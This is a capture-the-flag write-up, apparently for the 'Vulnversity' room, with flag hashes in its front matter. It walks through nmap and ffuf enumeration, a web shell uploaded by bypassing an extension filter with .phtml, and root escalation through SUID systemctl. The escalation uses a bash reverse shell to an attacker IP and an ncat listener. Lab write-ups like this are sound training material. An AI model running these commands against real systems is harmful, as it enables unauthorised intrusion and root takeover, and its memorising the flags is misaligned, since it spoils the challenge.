---
layout: writeup

title: Vulnversity
difficulty: easy
points: 0
categories: [ web_exploitation ]
tags: [ file_upload ]

flag:
  user: 8bd7992fbe8a6ad22a63361004cfcedb
  root: a58ff8579f0a9270368d33a9966c7fd5

---

# Enumeration

## Nmap scan

    Nmap scan report for 10.10.238.222
    Host is up (0.23s latency).
    Not shown: 993 closed tcp ports (conn-refused)
    PORT      STATE    SERVICE      VERSION
    21/tcp    open     ftp          vsftpd 3.0.3
    22/tcp    open     ssh          OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
    139/tcp   open     netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp   open     netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    3128/tcp  open     http-proxy   Squid http proxy 3.5.12
    3333/tcp  open     http         Apache httpd 2.4.18 ((Ubuntu))
    10003/tcp filtered documentum_s
    Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 69.80 seconds

## ffuf scans

### Port 3333

Scanned for subdirectories, in the end recursion was not needed

    ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/combined_directories.txt -u http://10.10.238.222:3333/FUZZ -recursion -recursion-depth 3 -ic
    
            /'___\  /'___\           /'___\       
           /\ \__/ /\ \__/  __  __  /\ \__/       
           \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
            \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
             \ \_\   \ \_\  \ \____/  \ \_\       
              \/_/    \/_/   \/___/    \/_/       
    
           v2.1.0
    ________________________________________________
    
     :: Method           : GET
     :: URL              : http://10.10.238.222:3333/FUZZ
     :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/combined_directories.txt
     :: Follow redirects : false
     :: Calibration      : false
     :: Timeout          : 10
     :: Threads          : 40
     :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
    ________________________________________________
    
    css                     [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 250ms]
    [INFO] Adding a new job to the queue: http://10.10.238.222:3333/css/FUZZ
    
    images                  [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 3266ms]
    [INFO] Adding a new job to the queue: http://10.10.238.222:3333/images/FUZZ
    
    internal                [Status: 301, Size: 324, Words: 20, Lines: 10, Duration: 233ms]
    [INFO] Adding a new job to the queue: http://10.10.238.222:3333/internal/FUZZ
    
    fonts                   [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 232ms]
    [INFO] Adding a new job to the queue: http://10.10.238.222:3333/fonts/FUZZ
    
    js                      [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 4276ms]
    [INFO] Adding a new job to the queue: http://10.10.238.222:3333/js/FUZZ

# Exploitation
## User
In the `/internal/` subdirectory there is a file upload form, let's try to upload a web shell.

![img.png](vulnversity_assets/img.png)

![img.png](vulnversity_assets/p0wny_upload.png)

Trying to upload a [P0wny](https://github.com/flozz/p0wny-shell) web shell yields an error `extension not allowed`, so
lets try a bit of fuzzing of extensions with **burp sniper**

![img.png](vulnversity_assets/img_other.png)

The `.phtml` extension is the only one that seems to be allowed

![img_1.png](vulnversity_assets/img_1.png)

with this web shell we can search for the user flag in the home directory

![img_2.png](vulnversity_assets/img_2.png)

## Root
From here we can start looking for privilege escalation techniques, so let's scan for SUID binaries.

    $: find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \;

    ...
    /bin/systemctl
    ...

We see `systemctl` which is a [known vulnerability](https://gtfobins.github.io/) so lets use it.

1. Create a `.service` file that triggers a reverse shell

        [Unit]
        Description=roooooooooot
        
        [Service]
        Type=simple
        User=root
        ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'
        
        [Install]
        WantedBy=multi-user.target
2. Enable the service: `systemctl enable privesc.service`
3. Listen on your computer for incoming connections: `ncat -nlvp 9999`
4. Run the service: `systemctl start privesc`

We get a shell on our `ncat` window so we just move to the root directory and cat the flag.
![img_3.png](vulnversity_assets/img_3.png)